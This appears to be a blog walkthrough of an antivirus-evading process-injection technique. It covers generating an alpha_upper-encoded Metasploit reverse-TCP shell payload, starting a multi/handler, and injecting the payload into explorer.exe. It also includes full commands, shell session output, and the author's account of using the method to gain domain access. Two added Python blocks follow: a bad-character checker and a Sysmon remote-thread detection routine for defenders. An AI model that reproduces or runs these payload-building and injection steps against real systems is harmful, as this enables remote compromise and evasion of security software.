A few people came to me today saying they had tried this new technique; it looked awesome but was not functioning correctly. Below is a description of why it was not working for them and how to fix it. Here is a link to the program for reference.
Videos are cool and all, but as we know they tend to leave things out. In this case they left out the proper way to create the shellcode, and they also left out how to create the file that gets injected into the process. So below is a walkthrough, without missing any details, of how to get a shell by injecting into a process with injector. Honestly, I wish people who developed tools would not leave out details in their videos. I also wish they would learn to talk and explain things as they create the video rather than having a distracting song.
Mainly, I believe the issues people were having come down to bad characters within their shellcode. (I did not verify this in a debugger, but the crash behavior points to this.)
When you inject a payload into a process, any bad character in it, such as a null byte, will make the process terminate or produce undesired results. The bad set is not always just null; every process and program is built differently, depending on what it expects in that data. Encoding is a good way to solve these issues. So let's get to it!
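To make the bad-character point concrete, here is an added example (not code from the original post or from the injector tool) that turns the manual "strip the + signs and join the strings" step into a parser, scans the resulting bytes for a bad-character set, shows how much of a buffer survives a C-string copy when a NUL is present, and checks that a buffer is confined to the alpha_upper encoder's uppercase alphanumeric alphabet. The byte listing and the alphanumeric string it operates on are constructed samples, not real shellcode or real msfencode output.

```python
"""
Added example, not from the original post or the injector tool: why a
"bad character" such as a NUL byte corrupts an injected buffer, and how
to check a payload listing against a bad-character set before blaming
the injector. The sample bytes and listings below are constructed, not
real shellcode or real msfencode output.
"""
import re

# A typical starting bad-character set: NUL terminates C strings, and
# CR/LF end lines in text-based transports. Extend per target.
DEFAULT_BADCHARS = frozenset({0x00, 0x0A, 0x0D})

# The x86/alpha_upper encoder emits only uppercase letters and digits,
# so its output can be validated against this alphabet.
ALPHA_UPPER_RE = re.compile(rb"[A-Z0-9]+")

# Matches one double-quoted literal made entirely of \xNN escapes, the
# form used in msfencode's quoted-string listings ("\x31\xc0" + ...).
_HEX_LITERAL_RE = re.compile(r'"((?:\\x[0-9a-fA-F]{2})*)"')


def parse_hex_listing(text: str) -> bytes:
    """Collapse a listing of hex-escaped string literals joined with + into raw bytes.

    This is the manual "remove the + signs and join the strings" step done
    programmatically (assumption: every literal consists only of hex escapes).
    """
    chunks = _HEX_LITERAL_RE.findall(text)
    return b"".join(bytes.fromhex(chunk.replace("\\x", "")) for chunk in chunks)


def find_badchars(buf: bytes, badchars=DEFAULT_BADCHARS):
    """Return (offset, byte) pairs for every byte of buf that is in the bad set."""
    return [(i, b) for i, b in enumerate(buf) if b in badchars]


def c_string_view(buf: bytes) -> bytes:
    """Bytes a C-string API (strcpy, lstrlenA, ...) actually sees: up to the first NUL.

    Anything after the NUL is silently dropped, which is the usual reason an
    otherwise valid payload arrives truncated and crashes the target.
    """
    nul = buf.find(b"\x00")
    return buf if nul < 0 else buf[:nul]


def is_alpha_upper(buf: bytes) -> bool:
    """True if buf is confined to the alpha_upper encoder's output alphabet."""
    return ALPHA_UPPER_RE.fullmatch(buf) is not None


def report(buf: bytes, badchars=DEFAULT_BADCHARS) -> dict:
    """Summarise a buffer: length, bad bytes found, and how much survives a C-string copy."""
    bad = find_badchars(buf, badchars)
    return {
        "length": len(buf),
        "bad": bad,
        "survives_strcpy": len(c_string_view(buf)),
        "alpha_upper_only": is_alpha_upper(buf),
    }


if __name__ == "__main__":
    # Constructed raw listing containing a NUL at offset 2.
    raw_listing = 'buf = \n"\\x31\\xc0" +\n"\\x00\\x50"'
    print(report(parse_hex_listing(raw_listing)))
    # Constructed stand-in for alpha_upper output (not a real encoded payload).
    print(report(b"TYIIIIQZ0A1B2C3D4E5F"))
```

Run against the constructed listing, the report shows a four-byte buffer of which only two bytes survive a C-string copy; the alphanumeric sample passes both checks, which is exactly why an alpha_upper-encoded payload avoids the crash the post describes.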
Original Video: http://vimeo.com/14139105
Issues people had:
- Injecting into Explorer.exe crashes the process... (explorer being a good process because it re-spawns)
Resolution:
- Alpha upper encoding
- Using the py file to create raw code
So basically the problem people were having is that there were bad characters in their shellcode that crashed the process. Following is a step by step on how to use the antivirus bypass technique that the video does not show clearly and in its entirety.
1. First, create your shellcode (alpha-upper encode the shellcode and add a thread exit function):
root@Ficti0n:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 EXITFUNC=thread R | ./msfencode -e x86/alpha_upper
[*] x86/alpha_upper succeeded with size 699 (iteration=1)
The output from this will be very large, but no worries, size doesn't appear to be an issue.
2. Put this shellcode into the generic.py file like so (remove all + signs and surround the output with parentheses).
3. Start up your multi/handler; after you receive the payload you will get a shell. (Go to step 4 below to send off your payload.)
msf > use multi/handler
msf exploit(handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.10:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.10:4444 -> 192.168.1.3:2438) at Tue Aug 17 20:30:20 -0400 2010
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator> YAY FOR SHELL
4. Check your process list for explorer.exe, then ship off your payload into the process. The payload is now encoded to remove all bad characters, and with your multi/handler running you should receive a shell no problem.
C:\Documents and Settings\Administrator\Desktop\injector>tasklist
Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         28 K
System                         4 Console                 0        244 K
smss.exe                     620 Console                 0        388 K
csrss.exe                    668 Console                 0      1,660 K
winlogon.exe                 692 Console                 0      5,152 K
services.exe                 736 Console                 0      4,312 K
lsass.exe                    748 Console                 0      1,544 K
vmacthlp.exe                 904 Console                 0      2,292 K
svchost.exe                  920 Console                 0      4,548 K
svchost.exe                 1000 Console                 0      4,012 K
svchost.exe                 1092 Console                 0     21,824 K
svchost.exe                 1136 Console                 0      3,060 K
svchost.exe                 1212 Console                 0      4,584 K
spoolsv.exe                 1416 Console                 0      5,476 K
sqlservr.exe                1800 Console                 0      8,684 K
sqlwriter.exe               1948 Console                 0      3,268 K
notepad++.exe               2104 Console                 0      3,072 K
notepad.exe                 3612 Console                 0      3,388 K
explorer.exe                1568 Console                 0     22,064 K
tasklist.exe                1900 Console                 0      4,244 K
wmiprvse.exe                2708 Console                 0      5,404 K
C:\Documents and Settings\Administrator\Desktop\injector>injector.exe pgeneric.txt 1568
[*] Author: DouBle_Zer0
[*] HACKERS GARAGE Production
[*] Visit Us: http://www.garage4hackers.com
C:\Documents and Settings\Administrator\Desktop\injector> Your payload was just sent!! check your meterpreter
I hope that clears a few things up for anyone who was asking me how to utilize this tool on a pentest. This is an excellent technique and very neat, but the explanation of proper payloads and examples was lacking. I would have much preferred a written write-up with more detail for reference, so that is what I am providing.
Final note: you will notice I used the explorer.exe process. The reason I used explorer.exe is that if I blow it up, it will respawn itself. This is also a good technique when migrating processes in Meterpreter: if explorer.exe fubars, you can just kill the process and it will respawn. I have used this technique on processes running as a domain administrator to get full domain access. When I blew up the process I lost access, but I was able to just respawn it and regain my foothold when no hashes or tokens were available.
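From the defensive side, the same property that makes explorer.exe a convenient target (it is always running and respawns) makes a remote thread created in it by an unexpected process a cheap thing to alert on. The following is an added example, not part of the original post or the injector tool: a small detection routine over Sysmon Event ID 8 (CreateRemoteThread) records that flags threads created in explorer.exe by a non-allowlisted source, threads whose start address is not backed by any loaded module, and threads whose entry point is a LoadLibrary function (the classic DLL-injection pattern). It assumes the injector creates a remote thread in its target, which the post does not state; the event records, paths, PIDs and the allowlisted "avscan.exe" agent are all constructed.

```python
"""
Added example, not part of the original post or the injector tool: a small
detection routine over Sysmon Event ID 8 (CreateRemoteThread) records.
Assumes the injector creates a remote thread in its target (the post does
not describe the tool's internals). The records below are constructed
samples in a simplified dict form, not real Sysmon events.
"""
import ntpath

# Processes that are attractive injection targets on a workstation; the
# post's explorer.exe is the one under discussion. Tune per environment.
WATCHED_TARGETS = {"explorer.exe"}

# Source images known to legitimately create remote threads here
# (constructed placeholder: a hypothetical endpoint agent). Keep this short.
ALLOWLISTED_SOURCES = {"avscan.exe"}

# Field names follow Sysmon's Event ID 8 schema; values are constructed.
SAMPLE_EVENTS = [
    {   # injector-style thread into explorer.exe from an unbacked start address
        "UtcTime": "2010-08-18 00:30:20.000",
        "SourceImage": r"C:\Documents and Settings\Administrator\Desktop\injector\injector.exe",
        "SourceProcessId": 3344,
        "TargetImage": r"C:\WINDOWS\explorer.exe",
        "TargetProcessId": 1568,
        "StartAddress": "0x00960000",
        "StartModule": "",          # empty: start address is not inside a loaded module
        "StartFunction": "",
    },
    {   # allowlisted agent doing a module-backed remote thread into explorer.exe
        "UtcTime": "2010-08-18 00:31:02.000",
        "SourceImage": r"C:\Program Files\Example AV\avscan.exe",
        "SourceProcessId": 1700,
        "TargetImage": r"C:\WINDOWS\explorer.exe",
        "TargetProcessId": 1568,
        "StartAddress": "0x7C810000",
        "StartModule": r"C:\WINDOWS\system32\kernel32.dll",
        "StartFunction": "LoadLibraryA",
    },
    {   # unknown source using a LoadLibraryA entry point against notepad.exe
        "UtcTime": "2010-08-18 00:31:40.000",
        "SourceImage": r"C:\Documents and Settings\Administrator\Desktop\injector\injector.exe",
        "SourceProcessId": 3344,
        "TargetImage": r"C:\WINDOWS\system32\notepad.exe",
        "TargetProcessId": 3612,
        "StartAddress": "0x7C810000",
        "StartModule": r"C:\WINDOWS\system32\kernel32.dll",
        "StartFunction": "LoadLibraryA",
    },
]


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path (works on any host OS)."""
    return ntpath.basename(path).lower()


def score_event(ev: dict, watched=WATCHED_TARGETS, allow=ALLOWLISTED_SOURCES):
    """Return (severity, reasons) for one CreateRemoteThread record.

    severity is "high" when the thread starts outside any loaded module,
    "medium" for the other patterns, and None when nothing matched.
    """
    src = image_name(ev.get("SourceImage", ""))
    tgt = image_name(ev.get("TargetImage", ""))
    unbacked = not ev.get("StartModule")
    reasons = []
    if unbacked:
        reasons.append("thread start address is not backed by a loaded module")
    if tgt in watched and src not in allow:
        reasons.append(f"remote thread into watched process {tgt} from {src}")
    if ev.get("StartFunction", "").startswith("LoadLibrary") and src not in allow:
        reasons.append("thread entry is LoadLibrary (DLL injection pattern)")
    if not reasons:
        return None, []
    return ("high" if unbacked else "medium"), reasons


def detect(events):
    """Run score_event over a batch and return the findings in input order."""
    findings = []
    for ev in events:
        severity, reasons = score_event(ev)
        if severity:
            findings.append({
                "time": ev.get("UtcTime"),
                "severity": severity,
                "source": image_name(ev["SourceImage"]),
                "source_pid": ev.get("SourceProcessId"),
                "target": image_name(ev["TargetImage"]),
                "target_pid": ev.get("TargetProcessId"),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["time"], f["source"], "->", f["target"], "|", "; ".join(f["reasons"]))
```

On the constructed batch this produces one high-severity finding (the unbacked thread into explorer.exe) and one medium finding (the LoadLibrary entry into notepad.exe), while the allowlisted agent's module-backed thread is ignored. The "unbacked start address" rule is the one worth keeping even if the allowlist grows: raw shellcode written into a process and started as a thread has, by construction, no module behind it.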